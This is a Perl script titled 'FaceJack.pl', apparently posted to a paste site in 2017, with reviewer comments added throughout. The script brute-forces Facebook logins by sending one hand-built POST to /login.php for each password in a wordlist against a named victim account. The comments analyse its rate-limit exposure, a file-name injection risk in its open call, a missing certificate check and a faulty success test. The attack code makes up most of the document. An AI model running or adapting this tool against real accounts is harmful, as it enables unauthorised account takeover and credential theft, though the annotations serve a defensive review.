Web-Vulnerability

FaceJack.pl

Aug 26th, 2017
  1. #!/usr/bin/perl
  2. #Facebook Brute-Force script by Exploit
  3. #After a certain amount of tries you might receive "You are trying to often, Please try again later"!
     #
     # Reviewer summary (defensive reading of this listing):
     #   * Technique: online password guessing against a single account. For each
     #     line of a wordlist the script opens a new TLS connection to
     #     www.facebook.com:443 and sends one POST /login.php.
     #   * The author's own note above records that the service throttles repeated
     #     attempts; per-account and per-source rate limiting, lockout and a second
     #     authentication factor are the controls this kind of loop runs into.
     #   * Every request carries the same hard-coded header set, cookie value and
     #     form tokens (see below), so the traffic is uniform from attempt to attempt.
     #   * `use strict` is enabled but `use warnings` is not.
  4. use strict;
  5. use Net::SSLeay::Handle;
  6.  
     # Argument check. defined() is applied to the value of the `&&` expression,
     # not to each argument separately, so this is not a strict "both arguments
     # present" test. On failure it shells out to `clear`, prints usage and exits.
  7. if(!defined($ARGV[0] && $ARGV[1])) {
  8.  
  9. system('clear');
  10. print "======================================================\n";
  11. print "# USAGE: perl FaceJack.pl victim passwords.txt       #\n";
  12. print "======================================================\n";
  13.  
  14. exit; }
  15.  
     # Both values come straight from the command line and are used unvalidated.
  16. my $user = $ARGV[0];
  17. my $passlist = $ARGV[1];
  18.  
     # Two-argument open on a bareword handle: the open mode is parsed out of
     # $passlist itself, so a "filename" beginning with `>` or ending with `|`
     # makes this call truncate a file or run a command on the operator's machine.
     # The handle is never explicitly closed.
  19. open (LIST, $passlist) || die "\nCannnot find wordlist $passlist \n";
  20.  
  21. print "\n \n";
  22. print "#######################################################\n";
  23. print "#                     --- Exploit ---                 #\n";
  24. print "####################################################### \n";
  25. print "# USAGE: perl FaceJack.pl victim passwords.txt        #\n";
  26. print "#######################################################\n";
     # Main loop: one candidate password per wordlist line, one connection each.
  27. while (my $password = <LIST>) {
  28. chomp ($password);
     # Percent-encodes the candidate in place. The second `^` inside the class is
     # a literal caret, so `^` is left unencoded, and "%0x" has no field width, so
     # the hex output is lowercase and not padded to two digits. Because the
     # variable is modified here, the progress lines printed later show the
     # encoded form, not the wordlist's original text.
  29. $password =~ s/([^^A-Za-z0-9\-_.!~*'()])/ sprintf "%%%0x", ord $1 /eg;
  30.  
     # Hand-built request line and headers. `my $a` / `my $b` shadow Perl's
     # sort variables. The header values are fixed strings (including the
     # Chrome/26 User-Agent), identical on every attempt.
  31. my $a = "POST /login.php HTTP/1.1";
  32. my $b = "Host: www.facebook.com";
  33. my $c = "Connection: close";
  34. my $e = "Cache-Control: max-age=0";
  35. my $f = "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8";
  36. my $g = "Origin: https://www.facebook.com";
  37. my $h = "User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31";
  38. my $i = "Content-Type: application/x-www-form-urlencoded";
  39. my $j = "Accept-Encoding: gzip,deflate,sdch";
  40. my $k = "Accept-Language: en-US,en;q=0.8";
  41. my $l = "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3";
  42.  
     # The cookie value and the lsd / lgnrnd / lgnjs form fields are literals baked
     # into the script, so they repeat unchanged in every request. $user is
     # interpolated into the body without any encoding; only $password was encoded.
  43. my $cookie = "cookie: datr=80ZzUfKqDOjwL8pauwqMjHTa";
  44. my $post = "lsd=AVpD2t1f&display=&enable_profile_selector=&legacy_return=1&next=&profile_selector_ids=&trynum=1&timezone=300&lgnrnd=031110_Euoh&lgnjs=1366193470&email=$user&pass=$password&default_persistent=0&login=Log+In";
  45. my $cl = length($post);
  46. my $d = "Content-Length: $cl";
  47.  
  48.  
  49. my ($host, $port) = ("www.facebook.com", 443);
  50.  
     # Ties the bareword handle SSL to a fresh TLS connection for this attempt.
     # NOTE(review): no certificate-verification option is set anywhere in this
     # script; confirm what Net::SSLeay::Handle does by default.
  51. tie(*SSL, "Net::SSLeay::Handle", $host, $port);
  52.  
  53.  
     # Headers are written with bare "\n" line endings rather than the CRLF that
     # HTTP/1.1 specifies, and the body is followed by one extra "\n" that is not
     # counted in Content-Length.
  54. print SSL "$a\n";
  55. print SSL "$b\n";
  56. print SSL "$c\n";
  57. print SSL "$d\n";
  58. print SSL "$e\n";
  59. print SSL "$f\n";
  60. print SSL "$g\n";
  61. print SSL "$h\n";
  62. print SSL "$i\n";
  63. print SSL "$j\n";
  64. print SSL "$k\n";
  65. print SSL "$l\n";
  66. print SSL "$cookie\n\n";
  67.  
  68. print SSL "$post\n";
  69.  
     # Reads the whole response line by line. The lazy group `(.*?)` has nothing
     # after it, so it captures the empty string: $success becomes defined (as '')
     # as soon as any response line contains the text "Location". The status code
     # and the redirect target are never inspected, so a "Cracked" line from this
     # script only means that such a line was seen in the response.
  70. my $success;
  71. while(my $result = <SSL>){
  72. if($result =~ /Location(.*?)/){
  73. $success = $1;
  74. }
  75. }
     # No "Location" text seen: report the attempt and move on to the next line.
  76. if (!defined $success)
  77. {
  78. print "$password -> Cracking \n";
  79. close SSL;
  80. }
     # Otherwise print the candidate in green (the ANSI colour is never reset)
     # and stop the whole run.
  81. else
  82. {
  83. print "\x1b[32mCracked  => $password <=\n";
  84. close SSL;
  85. exit;
  86. }
  87. }